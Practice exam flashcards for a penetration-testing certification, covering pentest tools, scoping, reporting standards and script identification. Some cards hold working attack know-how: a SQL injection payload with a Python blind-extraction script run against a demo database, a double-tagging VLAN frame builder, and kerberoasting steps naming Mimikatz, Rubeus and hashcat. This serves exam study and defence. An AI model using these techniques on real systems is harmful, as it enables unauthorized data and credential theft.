Practice Exam Flashcards
Charles has compromised a Linux system and wants to capture traffic from the command line. What tool should he select?
A. Wireshark
B. netcat
C. grep
D. tcpdump
tcpdump
Charles will be most successful with tcpdump, a command-line packet capture tool that is installed on or readily available for almost every Linux distribution. Netcat can listen on a port and dump whatever one peer sends to it, but it sees only that single connection rather than the traffic on the wire, so it is not a packet capture tool and wouldn't be the first choice for a penetration tester who has a better option. Wireshark is a graphical tool, and grep is used for text searching, not packet capture.
Karen wants to use a wireless security tool to create a fake access point. Which of the common wireless security tools is best suited to this?
A. Aircrack‐ng
B. Kismet
C. WiFite
D. AirShark
Aircrack‐ng
Aircrack-ng provides all of the tools required to conduct an evil-twin attack: airmon-ng puts the adapter into monitor mode and airbase-ng stands up the fake access point. Wifite and Kismet are useful wireless security tools with other purposes, and AirShark was made up for this question.
Kismet
Kismet is a wireless network detector, sniffer, and intrusion detection system used for penetration testing.
WiFite
WiFite is a tool designed to automate wireless attacks against various encryption types, including WEP, WPA, and WPS. It simplifies the process of testing the security of wireless networks by chaining together multiple attacks.
mdk4
Tool designed to exploit 802.11 protocol weaknesses and flaws
MDK4 is a Wi-Fi testing tool used to perform various wireless network attacks, such as deauthentication, beacon flooding, and other stress tests. It is commonly utilized for penetration testing of wireless networks to identify vulnerabilities.
Fern
wireless penetration testing tool used for cracking wireless passwords, performing network penetration testing, and more
Fern WiFi Cracker is a penetration testing tool designed for discovering and exploiting vulnerabilities in wireless networks. It provides capabilities for network discovery, cracking WEP/WPA/WPS keys, and performing other Wi-Fi security assessments.
John has been asked to notify his target organization of the specific times that his tests will occur during an unknown environment penetration test. After testing with limited success, he discovers that the system and security administrators were notified that he would be testing during that timeframe. What concern should John express to his employer?
A. The test should be conducted after hours to test staff responses outside the business day.
B. The system administrators may not accept the results of the test.
C. The test may not represent typical behavior due to the administrators knowing about it.
D. The test is valid and will provide more useful information about response capabilities due to the notification.
The test may not represent typical behavior due to the administrators knowing about it.
Penetration testers who discover that their target was notified of their testing when notification was not previously discussed may have to worry about their testing being spoiled. Administrators may have changed specific settings during the time the test occurred, and restored them after the fact—the authors of this book have seen this happen, with administrators turning firewalls on during the testing time to make systems “invisible,” and then turning them back off as soon as the test was over!
Maria is preparing to conduct a penetration test and wants to follow a penetration testing standard. Which of the following standards is most useful for her to base her process and procedures on?
A. OWASP
B. OSSTMM
C. ATT&CK
D. NIST
OSSTMM
The Open Source Security Testing Methodology Manual is the only option from this list that is itself a penetration testing methodology. NIST is the National Institute of Standards and Technology, a body that publishes standards and guides (including SP 800-115 on security testing) but is not a standard itself. ATT&CK is a framework and knowledge base used to track and classify adversary tactics and techniques. OWASP is the Open Web Application Security Project (now the Open Worldwide Application Security Project), a foundation that works to improve the security of software, particularly web applications.
OSSTMM
The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for conducting security testing and analysis. It provides standardized guidelines for evaluating the operational security of systems, networks, and processes. The OSSTMM emphasizes verifiable and measurable results to ensure the reliability of the security assessment process.
Shen is conducting a penetration test and discovers signs of a past intrusion on the system. What action should she take first?
A. Document the evidence in her report.
B. Notify management.
C. Review the attack evidence and incorporate techniques in her own test.
D. Eradicate all traces of the attack from the system.
Notify management.
Shen is ethically obligated to immediately report the signs of a prior attack or criminal activity to management. She should do this prior to conducting any other activity and should await instructions before resuming the test.
Cameron is negotiating with a penetration testing organization and wants to create a document that details the deliverables and timelines that the vendor will use while providing the service. What type of document is he creating?
A. An EULA
B. An SOW
C. An NDA
D. An MSA
An SOW
Cameron is creating a statement of work, which describes what will be done and the amount of time it will take to complete it. A EULA is an end‐user license agreement, often associated with software. An NDA is a nondisclosure agreement, and an MSA is a master services agreement.
Which one of the following is an example of a process control that might be suggested to remediate a penetration test finding?
A. Firewall rule change
B. Security awareness campaign
C. DLP implementation
D. Two‐person control
Two‐person control
Two‐person control is an example of a business process that might be implemented as a security control. Firewall rule changes, and the implementation of a DLP system are examples of technical controls. A security awareness campaign is an example of a personnel control.
Victor is attempting to penetrate a web application and sends the following input to the application:
Victor' AND 1=2;--
What type of SQL injection attack is Victor attempting?
A. Standard SQL injection
B. Blind content‐based SQL injection
C. Blind timing‐based SQL injection
D. Privileged SQL injection
Blind content‐based SQL injection
The condition 1=2, which always evaluates to false, is the signature of a content-based (also called boolean-based) blind SQL injection attack: the tester compares the response for a condition known to be true with the response for one known to be false and infers data from the difference. Standard SQL injection returns query results directly and would not need this technique. Timing-based attacks would include a command that triggers a delay, such as SLEEP() or WAITFOR DELAY. Privileged SQL injection is not a normal category of exploit.
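The boolean oracle behind Victor's payload, as an added example in Python that is not part of the original question. It builds an in-memory SQLite table with constructed sample rows, shows the string-built query that makes the injection possible next to the parameterised query that does not, and then uses the true/false difference alone to recover a column value character by character, which is the whole point of a content-based blind attack. The trailing semicolon from the question's payload is omitted because the Python sqlite3 driver executes one statement per call; the -- comment marker by itself is enough to discard the rest of the query. The table, column and user names are assumptions made for the demo.

```python
import sqlite3
import string

# Character set the blind extraction will try at each position (assumption for the demo).
CHARSET = string.ascii_lowercase + string.digits


def make_db():
    """Constructed sample data: a tiny users table, not taken from the original page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("Victor", "user"), ("alice", "admin")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Deliberately vulnerable: the untrusted value is spliced into the SQL text,
    so a quote in the input ends the string literal and the rest becomes SQL."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameterised query: the value is bound separately from the statement,
    so quotes and comment markers in the input are never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def page_shows_record(conn, payload):
    """The boolean oracle: does the application return a record for this input?
    A blind attacker sees only this yes/no difference, never the query results."""
    return len(lookup_vulnerable(conn, payload)) > 0


def extract_blind(conn, known_user, column, max_len=16):
    """Recover `column` for `known_user` one character at a time by asking the
    oracle "is character N equal to X?" for every candidate X."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            # Same shape as Victor's payload, with a true/false test on one character.
            payload = f"{known_user}' AND substr({column},{pos},1)='{ch}'--"
            if page_shows_record(conn, payload):
                recovered += ch
                break
        else:
            break  # no candidate matched: we ran off the end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("1=1 shows a record:", page_shows_record(db, "Victor' AND 1=1--"))
    print("1=2 shows a record:", page_shows_record(db, "Victor' AND 1=2--"))
    print("role recovered blind:", extract_blind(db, "Victor", "role"))
    print("parameterised query, same payload:", lookup_safe(db, "Victor' AND 1=1--"))
```

The extraction loop sends one request per candidate character per position, which is why blind injection is noisy in web server logs: a burst of near-identical requests differing only in a substr() comparison is a useful detection signature.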
Tim recently wrote a Bash script called passwordcracker.sh to perform password cracking. When he tried to execute the script during a penetration test, he received a permission denied error message. What command can Tim execute to correct this permission and allow only him, as the file’s owner, to execute the script?
A. chmod o+x passwordcracker.sh
B. chmod u+x passwordcracker.sh
C. chmod g+x passwordcracker.sh
D. chmod a+x passwordcracker.sh
chmod u+x passwordcracker.sh
The chmod u+x command adds execute permission for the file's owner. The other commands all grant different permissions. The g+x argument provides execute permission to members of the file's group. The o+x argument to chmod grants execute permission to everyone other than the file's owner or group. The a+x argument provides execute permission to everyone.
Christopher is conducting a penetration test of an organization as part of an unknown environment assessment. He is currently testing a public‐facing web application. Which one of the following software testing techniques will not be available to him?
A. Static analysis
B. Dynamic analysis
C. Fuzz testing
D. Vulnerability scanning
Static analysis
Christopher can easily conduct vulnerability scanning using a web application testing tool because the website is public‐facing. This tool should be able to assist him with fuzz testing, which is a form of dynamic analysis. Christopher cannot, however, perform static analysis of the source code because he does not have access to that inside information as part of an unknown environment test.
MCDS, Inc. uses Microsoft’s Azure cloud to host their primary website and e‐commerce infrastructure. Steve has been asked to include both cloud‐hosted environments in a penetration test he is conducting. What step is critical to ensuring he has proper authorization to conduct scans of the cloud‐hosted systems?
A. He needs administrative rights for the Azure environment.
B. He needs sign‐off from the lead or manager of the infrastructure team.
C. He needs authorization from the third‐party provider.
D. He needs authorization from the organization’s ISP.
He needs authorization from the third‐party provider.
Steve needs authorization from the cloud service provider. In most cases, third‐party providers require prior authorization for penetration testing or other efforts that may cause issues for other users of their shared infrastructure or that may register as attacks against systems or services they host. Some simply don’t allow penetration tests, whereas others may have specific requirements for penetration testers.
Tiffany wants to gather OSINT data about the services that specific systems run in her target organization. Which of the following tools will not allow her to do this?
A. Censys
B. nmap
C. Shodan
D. theHarvester
nmap
Censys, Shodan, and theHarvester will all allow Tiffany to conduct OSINT information gathering that does not actively scan her target. Nmap is an active scanning tool and will not allow her to gather this type of information without connecting to the target systems and networks.
Censys
OSINT tool
Censys is an Open Source Intelligence (OSINT) tool used for discovering and analyzing devices connected to the internet. It collects data about servers, networks, and websites, allowing penetration testers to gather valuable information such as open ports, SSL certificates, and software versions. This makes it particularly useful for identifying potential vulnerabilities during the reconnaissance phase.
Shodan
OSINT Tool
Shodan is a search engine designed to locate and provide details about internet-connected devices and systems, such as servers, webcams, routers, and industrial control systems. It allows penetration testers to gather information on exposed devices, open ports, services, and vulnerabilities. Shodan is widely used for passive reconnaissance during penetration testing.
theHarvester
OSINT tool
theHarvester is a reconnaissance tool used to gather information about a target organization from publicly available sources. It automates the collection of data such as email addresses, subdomains, IPs, and URLs by querying search engines, public databases, and other resources. It is commonly employed during the passive reconnaissance phase of penetration testing.
Jack performs a scan using the command nmap 10.11.45.0/24. How many TCP ports will he scan?
A. 512
B. 1,000
C. 1,024
D. 65,535
1,000
By default, nmap scans the 1,000 most common TCP ports (as ranked by nmap's own frequency data) on each host unless a flag such as -p supplies a port list or range. UDP ports are scanned only when -sU is specified, and the /24 notation changes the number of hosts scanned, not the number of ports per host.
What happens in a double‐tagging attack after the tagged packet arrives at the first switch?
A. The switch reads both tags and forwards the packet to the VLAN listed in the first tag.
B. The switch reads both tags and forwards the packet to the VLAN listed in the second tag.
C. The switch forwards the packet to the VLAN listed in the first tag and removes it.
D. The switch forwards the packet to the VLAN listed in the second tag and removes it.
The switch forwards the packet to the VLAN listed in the first tag and removes it.
Double tagging relies on the attacker sitting in the native VLAN of a trunk and on the switch forwarding native-VLAN traffic untagged: the first switch reads only the outer tag, which matches the native VLAN, strips it, and forwards the frame across the trunk. The next switch sees only the second tag (now the only tag) and delivers the frame to that VLAN as if it were a normally tagged packet. Because replies have no path back, the attack is one-way. Moving the trunk's native VLAN to an unused VLAN that no access port belongs to defeats it.
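A byte-level model of the double-tagging sequence, added here as an illustration and not part of the original question. It builds an Ethernet frame with two stacked 802.1Q tags and passes it through a minimal model of a switch port: the switch looks only at the outer tag and strips it when it matches the trunk's native VLAN, so the inner tag is all the next switch sees. The MAC addresses, VLAN numbers and payload are constructed, and the model ignores PCP/DEI bits and the frame check sequence.

```python
import struct

TPID_8021Q = 0x8100      # EtherType value that marks an 802.1Q tag
ETHERTYPE_IPV4 = 0x0800


def build_double_tagged_frame(dst, src, outer_vid, inner_vid, payload):
    """Ethernet frame carrying two stacked 802.1Q tags (PCP/DEI bits left at zero)."""
    return (
        dst + src
        + struct.pack("!HH", TPID_8021Q, outer_vid & 0x0FFF)
        + struct.pack("!HH", TPID_8021Q, inner_vid & 0x0FFF)
        + struct.pack("!H", ETHERTYPE_IPV4)
        + payload
    )


def parse_tags(frame):
    """Return the VLAN IDs in the order they appear plus the offset of the real EtherType."""
    vids = []
    off = 12  # after destination and source MAC
    while off + 4 <= len(frame) and struct.unpack_from("!H", frame, off)[0] == TPID_8021Q:
        tci = struct.unpack_from("!H", frame, off + 2)[0]
        vids.append(tci & 0x0FFF)
        off += 4
    return vids, off


def switch_ingress(frame, native_vlan):
    """Minimal model of a switch forwarding a tagged frame toward a trunk.

    The switch reads only the first tag. When that tag names the trunk's native
    VLAN it is stripped, because native-VLAN traffic is sent untagged across
    the trunk; whatever follows (including a second tag) is forwarded as-is.
    Returns (VLAN the frame is forwarded on, frame as forwarded)."""
    vids, _ = parse_tags(frame)
    if not vids:
        return native_vlan, frame
    outer = vids[0]
    if outer == native_vlan:
        return outer, frame[:12] + frame[16:]   # drop the 4-byte outer tag
    return outer, frame


def double_tag_attack(attacker_native_vlan=1, victim_vlan=20):
    """Walk the constructed frame through two switches and report what each saw."""
    dst = bytes.fromhex("ffffffffffff")   # constructed broadcast destination
    src = bytes.fromhex("0a0b0c0d0e0f")   # constructed attacker MAC
    frame = build_double_tagged_frame(dst, src, attacker_native_vlan, victim_vlan,
                                      b"\x45" + bytes(19))
    first_vlan, after_first = switch_ingress(frame, native_vlan=attacker_native_vlan)
    second_vlan, after_second = switch_ingress(after_first, native_vlan=attacker_native_vlan)
    return first_vlan, second_vlan, parse_tags(after_second)[0]


if __name__ == "__main__":
    # First switch forwards on VLAN 1 and strips the tag; second delivers to VLAN 20.
    print(double_tag_attack())
```

Running switch_ingress with native_vlan set to an unused ID (the mitigation above) leaves the outer tag in place, so the frame never escapes the attacker's own VLAN.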
Which one of the following methods is not used to obtain user session cookies during a penetration test?
A. On‐path attack
B. Malware
C. Network eavesdropping
D. Tailgating
Tailgating
Tailgating is used to obtain physical access to a facility and can’t be used to obtain session cookies. Penetration testers seeking to obtain a session cookie may steal it by performing an on‐path attack, conducting network eavesdropping, or installing malware on the target user’s system.
Ann is performing a kerberoasting attack and has scanned for user accounts with SPNs set and had requested service tickets using SPNs. What should she do next?
A. Send service tickets to the server.
B. Extract the service tickets from memory and save them.
C. Insert NTLM hashes into the service tickets to authenticate.
D. Conduct an offline brute‐force attack against the SPNs.
Extract the service tickets from memory and save them.
The next step in Ann’s attack is to extract the service tickets from memory and to save them to a file. Then she can use an offline brute‐force attack against the passwords in the service tickets.
Kerberoasting
Kerberoasting is an attack method used to exploit vulnerabilities in the Kerberos authentication protocol to obtain and potentially crack service account credentials.
This attack relies on weak passwords for service accounts, making strong password policies essential to defend against it
Steps of Kerberoasting
Kerberoasting is an attack method used to exploit vulnerabilities in the Kerberos authentication protocol to obtain and potentially crack service account credentials.
Steps:
* Request a service ticket: the attacker, authenticated as any domain user, requests a TGS service ticket for the service principal name (SPN) of a target service account.
* Receive the encrypted ticket: the domain controller returns the ticket; its service portion is encrypted with a key derived from the service account's password (for the RC4-HMAC encryption type that key is the account's NT hash, which is why tools request RC4 tickets where the KDC still allows it).
* Extract the ticket: the attacker dumps the ticket from memory with a tool such as Mimikatz, or requests it directly with Rubeus or Impacket's GetUserSPNs.py, which write it out in a hashcat/John-compatible format.
* Crack the ticket: the attacker runs an offline brute-force or dictionary attack against the encrypted ticket (hashcat mode 13100 for RC4 tickets) to recover the service account's plaintext password. No traffic reaches the domain during this step, so the only on-network evidence is the ticket request itself.
This attack relies on weak passwords for service accounts, making strong password policies essential to defend against it
Which one of the following combinations of authentication techniques is an example of multifactor authentication?
A. Username and password
B. Security question and PIN
C. ID card and fingerprint
D. ID card and smartphone app
ID card and fingerprint
An ID card is an example of “something you have” and a fingerprint is “something you are,” so that scheme qualifies as multifactor authentication. A username is an identification mechanism, not an authentication mechanism. Security questions and PINs are both “something you know,” so they do not constitute multifactor authentication when used together. ID cards and smartphone apps are both examples of “something you have.”
Richard is conducting network reconnaissance as part of a penetration test and would like to use a tool that allows him to scan the entire network and identify potential vulnerabilities on servers in the target organization. Which one of the following tools would meet Richard’s needs?
A. Nmap
B. Metasploit
C. Nessus
D. Kismet
Nessus
Nessus is a popular network vulnerability scanning tool that would meet Richard's requirements. The other tools listed do not perform network vulnerability scanning. Nmap is a port scanner that reports open ports and service versions; its NSE scripts can check for a handful of specific issues, but it is not a vulnerability scanner. Metasploit is an exploitation framework useful in later phases of the penetration test, and Kismet is a wireless network detector and sniffer.
The company that Greg works for has recently undergone a penetration test, and the pentesters discovered that employees did not have appropriate separation of duties. Which of the following operational controls is not helpful when attempting to address this finding?
A. Job rotation
B. Time‐of‐day restrictions
C. Mandatory vacation
D. User training
Time‐of‐day restrictions
Separation of duties is intended to ensure that a single individual cannot take inappropriate actions. Time-of-day restrictions do not help with separation of duties, although they do help prevent staff members or penetration testers from using credentials after hours. Job rotation and mandatory vacations are useful because they offer a chance for malfeasance to be discovered when someone else takes over a role. User training can also help by ensuring that staff members know what is expected of them and what is not allowed.
Examine the following code snippet, used to create a URL:
$ip = "10.5.5.2"
$port = "80"
$url = "http://" + $ip + ":" + $port
What language is being used?
A. Python
B. Ruby
C. PowerShell
D. Bash
PowerShell
The use of dollar signs to prefix variable names in assignments, together with + for string concatenation, signals that this is code written in PowerShell. Bash references variables with $ but assigns without it (ip=10.5.5.2), Perl prefixes scalars with $ but concatenates with a period, and Ruby and Python use the + operator for concatenation but do not prefix variables with $.
Matthew is writing the report from a penetration test and would like to communicate his results using standard language. Which one of the following components of the NIST Security Content Automation Protocol (SCAP) can he use to describe security flaws in a standardized way?
A. CPE
B. CVSS
C. CCE
D. CVE
CVE
The Common Vulnerabilities and Exposures (CVE) standard provides a consistent way to describe security flaws. The Common Vulnerability Scoring System (CVSS) also involves vulnerabilities but provides a standardized way to discuss vulnerability severity, not the vulnerabilities themselves. Common Platform Enumeration (CPE) is used to provide a standard nomenclature for describing product names and versions. Common Configuration Enumeration (CCE) provides a standard nomenclature for discussing system configuration issues.
PowerShell script identifiers
- Windows originally, now also on Mac and Linux
- Uses cmdlet-based syntax like Get-, Set-, and Invoke-.
- Often includes .ps1 file extensions.
- May use Write-Output or Write-Host for displaying text.
- Variables are prefixed with a $ (e.g., $VariableName).
Bash script identifiers
- Used in Linux and Mac (and WSL)
- Often includes #!/bin/bash as a shebang (beginning) line at the start of scripts.
- Uses shell builtins and commands like echo, ls, and cat, and keywords such as then and fi.
- .sh files
- Variable assignment does not use a $ but references variables with $ (e.g., myVar=value and echo $myVar).
- Includes control structures like if [ … ]; then.
Python script identifiers
- Block headers (if, for, def, class) end with a colon.
- Uses indentation to define blocks instead of braces or keywords.
- File extensions are .py.
- Common syntax includes print(), def for functions, and import for libraries.
- Variables are dynamically typed and carry no prefix.
Ruby script identifiers
- File extensions are .rb.
- Uses puts or print for output.
- Commonly uses def to define methods and end to close blocks.
- Includes symbols like : (e.g., :symbolName) and often uses do … end for blocks.
Perl script identifiers
- File extensions are .pl.
- Variables are prefixed with $ (scalars), @ (arrays), or % (hashes).
- Uses print for output.
- Frequently uses regular expressions, indicated by =~ or /…/.
- \n is a newline; Perl's print does not append one automatically, so output lines usually end with an explicit \n.
- Every statement ends with a semicolon.
JavaScript script identifiers
- May use .js as file extensions.
- Frequently includes function keyword or arrow syntax (=>).
- Uses {} for blocks and console.log() for output.
- Variables are defined using var, let, or const.
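A small heuristic identifier built from the cues in the lists above, added as an example rather than taken from the page. Each regex that matches anywhere in a snippet scores one point for its language; the cue set is an assumption that covers these six identifier lists only, not a general-purpose language detector. The sample snippets are constructed, three of them copied from the questions on this page.

```python
import re

# Cues distilled from the identifier lists above (assumption: enough to tell these
# six apart, not a general-purpose detector). A regex that matches anywhere in
# the snippet scores one point for its language.
CUES = {
    "powershell": [
        r"^\s*\$\w+\s*=",                       # $name = value
        r"\b(Get|Set|Invoke|Write)-[A-Z]\w+",   # Verb-Noun cmdlets
        r"\s-(lt|le|eq|ne|gt|ge)\s",            # hyphenated comparison operators
        r"\+\s*\$\w+",                          # + concatenation onto a $variable
    ],
    "bash": [
        r"^#!\s*/bin/(ba)?sh",                  # shebang
        r"^\s*\w+=\S",                          # assignment: no $, no spaces
        r"^\s*fi\b",                            # closes an if block
        r"\becho\b",
        r"\];\s*then\b",                        # if [ ... ]; then
    ],
    "python": [
        r"^\s*(def|class|if|elif|for|while)\b[^\n]*:\s*$",  # block header ends with a colon
        r"^\s*(import|from)\s+\w+",
        r"\bprint\(",
        r"\b(True|False|None)\b",
    ],
    "ruby": [
        r"\bputs\b",
        r"\belsif\b",
        r"^\s*end\s*$",                         # blocks close with end
        r"\bdo\s*\|\w+\|",                      # do |item| ... end
    ],
    "perl": [
        r"\bmy\s+[\$@%]\w+",                    # my $scalar / @array / %hash
        r"=~",                                  # regex binding operator
        r"^\s*use\s+(strict|warnings)\b",
        r"\bprint\s+\"[^\"]*\\n\"",             # print "...\n" with an explicit newline
    ],
    "javascript": [
        r"\b(var|let|const)\s+\w+",
        r"\bfunction\b",
        r"=>",
        r"console\.log\(",
    ],
}

# Constructed samples; the PowerShell, Python and Ruby ones mirror the question snippets above.
SAMPLES = {
    "powershell": '$ip = "10.5.5.2"\n$port = "80"\n$url = "http://" + $ip + ":" + $port\n',
    "bash": '#!/bin/bash\nmyVar=value\nif [ "$myVar" = "value" ]; then\n  echo $myVar\nfi\n',
    "python": ("import requests\nurl = 'https://example.com/example.txt'\n"
               "data = requests.get(url, allow_redirects=True)\n"
               "open('example.txt', 'wb').write(data.content)\n"),
    "ruby": ("if server == 1\n  ip = '10.1.1.1'\nelsif server == 2\n  ip = '10.1.1.2'\n"
             "else\n  ip = '10.1.1.3'\nend\n"),
    "perl": 'my $name = "victor";\nprint "Hello, $name\\n" if $name =~ /^v/;\n',
    "javascript": "const url = 'https://example.com';\nconsole.log(url);\n",
}


def score_languages(snippet):
    """Number of cues matched per language."""
    return {
        lang: sum(1 for pat in pats if re.search(pat, snippet, re.MULTILINE))
        for lang, pats in CUES.items()
    }


def identify(snippet):
    """Best-scoring language, or 'unknown' when nothing matched."""
    scores = score_languages(snippet)
    best = max(scores, key=scores.get)
    return best if scores[best] > 0 else "unknown"


if __name__ == "__main__":
    for lang, code in SAMPLES.items():
        print(f"{lang:11} -> {identify(code)}  {score_languages(code)}")
```

The scores are more informative than the single label: a snippet that scores for both Perl and PowerShell usually means only the $-prefix cue fired, which is exactly the ambiguity the lists above warn about.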
CPE
Common Platform Enumeration
CPE stands for Common Platform Enumeration, a standardized method of naming software, hardware, and operating systems. It provides a consistent way to identify technology products, enabling easier integration and analysis of vulnerability information.
CVSS
CVSS, or Common Vulnerability Scoring System, is a standardized framework for assessing the severity of software vulnerabilities. It provides a numerical score (ranging from 0.0 to 10.0) and corresponding qualitative ratings (e.g., Low, Medium, High, Critical) to help organizations prioritize remediation efforts
CCE
Common Configuration Enumeration
CCE stands for Common Configuration Enumeration, a standardized identifier system for security-related configuration issues. It provides unique identifiers for configuration settings to help organizations manage and audit their systems more effectively. CCE is often used alongside other frameworks like CVE to enhance vulnerability and compliance management
CVE
Common Vulnerabilities and Exposures
CVE stands for Common Vulnerabilities and Exposures, a standardized system for identifying and cataloging known security vulnerabilities in software and hardware. Each CVE entry includes a unique identifier, a brief description of the vulnerability, and references to additional information about it. CVEs are widely used by vulnerability management tools to assess and prioritize risks in systems.
What information is most important to target selection for wireless networks?
A. The wireless standard (G, N, AC) used by the organization
B. The SSIDs that belong to the target company
C. The IMEI number associated with the access points
D. Whether the network uses WPA2 or WEP
The SSIDs that belong to the target company
Selecting the correct target is critical to a penetration test, and that requires you to know the SSIDs used by the target. If you conduct penetration testing activities against a network that you are not authorized to attack, you may be breaking the law and could cause unintended harm to an organization that you don’t have a contract with!
Joe is conducting a network vulnerability scan against his data center and receives reports from system administrators that the scans are slowing down their systems. There are only performance problems on individual hosts and no network connectivity issues.
Which setting would be most likely to correct the problem?
A. Scan IP addresses in a random order
B. Network timeout (in seconds)
C. Max simultaneous checks per host
D. Max simultaneous hosts per scan
Max simultaneous checks per host
Of the choices presented, the maximum number of simultaneous checks per host is the only setting that would positively affect individual systems. Changing the number of simultaneous hosts per scan and the network timeout would have an effect on the broader network. Randomizing IP addresses would not have a performance impact.
After compromising a user account on a Linux system, Ben discovers that he is unable to change directories and that he can’t set path or shell variables or redirect output. What has he most likely encountered?
A. The account is not on the sudoers list.
B. The account is a service account.
C. The account is using a restricted shell.
D. The account is not a valid user account.
The account is using a restricted shell.
Ben’s first guess should be that the account he has gained access to is using a restricted shell. Restricted shells commonly prevent users from changing directories, setting PATH or SHELL variables, specifying absolute pathnames, and redirecting output.
Restricted Shell
A restricted shell is a security feature used to limit the commands and actions that a user can perform in a shell environment. It modifies the behavior of the standard shell to restrict access to certain commands, directories, and functionalities, thereby reducing the risk of unauthorized or harmful activities by the user.
Common restrictions in a restricted shell include:
* Limiting the ability to change directories.
* Preventing the execution of certain commands or scripts.
* Restricting access to specific files or system paths.
Mike is conducting a penetration test and is using the results of an internal network vulnerability scan to guide his work. He is conducting his test from an external location. The report shows that a web application has a SQL injection vulnerability. He can access the web server but cannot exploit the vulnerability successfully. What is the least likely cause of Mike’s inability to exploit the vulnerability?
A. A network firewall is blocking access to the server.
B. An intrusion prevention system is detecting the attempt and blocking it.
C. Administrators already remediated the vulnerability.
D. A web application firewall is filtering the request.
A network firewall is blocking access to the server.
If a network firewall were blocking access to the server, Mike would not be able to access the application at all. However, an intrusion prevention system or web application firewall might allow normal access to the server but block attempts to conduct a SQL injection attack. It is also possible that administrators detected and remediated the vulnerability before Mike attempted his exploit.
Anand has discovered the following exploit code. What language is it written in and what does it do?
import requests
url = 'https://example.com/example.txt'
# HTTP GET, following any redirects, and keep the response
data = requests.get(url, allow_redirects=True)
# write the response body to a local file opened in binary mode
open('example.txt', 'wb').write(data.content)
A. Perl, file upload
B. JavaScript, file download
C. Ruby, file upload
D. Python, file download
Python, file download
This is a simple Python file download script: it imports the requests library, performs an HTTP GET on the URL (following redirects), and writes the response body to a local file opened in binary mode. Nothing is sent to the server other than the request, so it is a download, not an upload.
Ralph discovers a file containing hashed passwords during a penetration test but is able to crack 90 percent of them using John the Ripper. What finding should Ralph report in his final report?
A. Plain‐text passwords
B. Weak password encryption
C. Weak password complexity
D. No multifactor authentication
Weak password complexity
The only conclusion Ralph can reach from the information available is that the organization does not have a strong password complexity policy. If they did, the percentage of cracked passwords would be much lower. The scenario indicates that the passwords are hashed, so they are neither stored in plain text nor encrypted. We do not know from the information given whether multifactor authentication is in use.
Examine the following object. What language was most likely used for this object?
{
"system": {
"hostname": "www.certmike.com",
"ip": "54.174.107.98",
"security_scanned": true
}
}
A. JSON
B. XML
C. HTML
D. SQL
JSON
This is an example of a JavaScript Object Notation (JSON) object. We can determine this by noting that it uses key-value pairs inside curly braces to define attributes. The object lacks the <tag> and </tag> pairs that would be found in a markup language like XML or HTML, and it is not a database query written in Structured Query Language (SQL).
Conducting a social engineering exercise against his target, Greg tells a story claiming that only a few members of the staff will be recognized for assisting with the project he is working on. What motivation technique has he used?
A. Authority
B. Scarcity
C. Urgency
D. Likeness
Scarcity
Scarcity‐based persuasion focuses on limited rewards or opportunities. This can sound similar to urgency‐based efforts, which focus on limited time. Appeals to authority leverage making the target believe that you have the right or role to require them to perform an action, whereas likeness uses similarity with the penetration tester to build trust.
Orlando is writing a PowerShell script and tests the TCP ports open on a system using the following syntax:
port -lt 80
Which of the following ports would match this expression?
A. 22
B. 80
C. 443
D. All of the above
22
The -lt operator says that the variable on the left must be strictly less than the variable on the right. Port 22 is the only port that is strictly less than 80.
XML things to remember
- Uses custom-defined tags for structuring data, e.g., <tag>value</tag>.
- Requires closing tags for each element or uses self-closing tags, e.g., <tag/>.
- Supports attributes within tags, e.g., <tag attribute="value">content</tag>.
JSON things to remember
- Data is organized in key-value pairs within curly braces, e.g., {“key”: “value”}.
- Arrays are enclosed in square brackets, e.g., [“value1”, “value2”].
- Values can be strings, numbers, objects, arrays, or true, false, and null.
HTML things to remember
- Uses predefined tags for web content, e.g., <html>, <body>.
- Tags are not case-sensitive but typically written in lowercase.
- Allows inline JavaScript and CSS, often leading to potential security issues (e.g., XSS).
SQL things to remember
- Consists of commands and clauses, e.g., SELECT, INSERT, WHERE.
- Uses semicolon (;) to terminate statements.
- Case-insensitive for commands but case-sensitive for database and column names depending on the system.
PowerShell comparison operators
always start with a hyphen
- -lt: Less than
- -le: Less than or equal to
- -eq: Equal to
- -ne: Not equal to
- -gt: Greater than
- -ge: Greater than or equal to
Analyze the following segment of code:
if server == 1
ip = '10.1.1.1'
elsif server == 2
ip = '10.1.1.2'
else
ip = '10.1.1.3'
end
What language is this code written in?
A. Ruby
B. Bash
C. Python
D. PowerShell
Ruby
Following the language-identification flowchart in the referenced figure, we can quickly determine that the code is written in Ruby: it uses elsif and closes the block with an end statement. Python would use elif followed by a colon and indentation, Bash would use elif, then and fi, and PowerShell would use elseif with braces.
Which of the following programming languages will generate an error if the script attempts to concatenate a string and an integer without first performing an explicit conversion?
A. Bash
B. Ruby
C. PowerShell
D. All of the above
Ruby
Bash has no numeric type at all (every value is a string until arithmetic is requested), and PowerShell converts the right-hand operand to match the left: "a" + 1 yields "a1", although 1 + "a" does raise an error because "a" cannot be converted to a number. Neither therefore requires an explicit conversion in this case. Ruby (and Python) will raise a type error if a string and an integer are concatenated without converting one of them.
Kaiden is in the process of penetration testing a web application belonging to his target organization. He would like to use a tool specifically designed to perform automated web application testing. Which one of the following tools is best suited for this task?
A. Immunity
B. Nikto
C. ZAP
D. Metasploit
Nikto
Nikto is an automated web application vulnerability scanner that would be perfect for Kaiden's purposes. Immunity Debugger is a software debugging tool that would not be useful during a web application test. ZAP is an interception proxy whose core use is manually intercepting and manipulating requests (it ships an active scanner, but that is not its primary purpose), and Metasploit is an exploitation framework. Both ZAP and Metasploit may be used during testing, but neither is the purpose-built automated web scanner the question asks for.
Immunity
Immunity in the context of penetration testing tools refers to Immunity Debugger, which is designed specifically for supporting penetration tests and reverse engineering malware. It allows for dynamic analysis of executable files, making it a valuable tool for identifying vulnerabilities in software.
ZAP
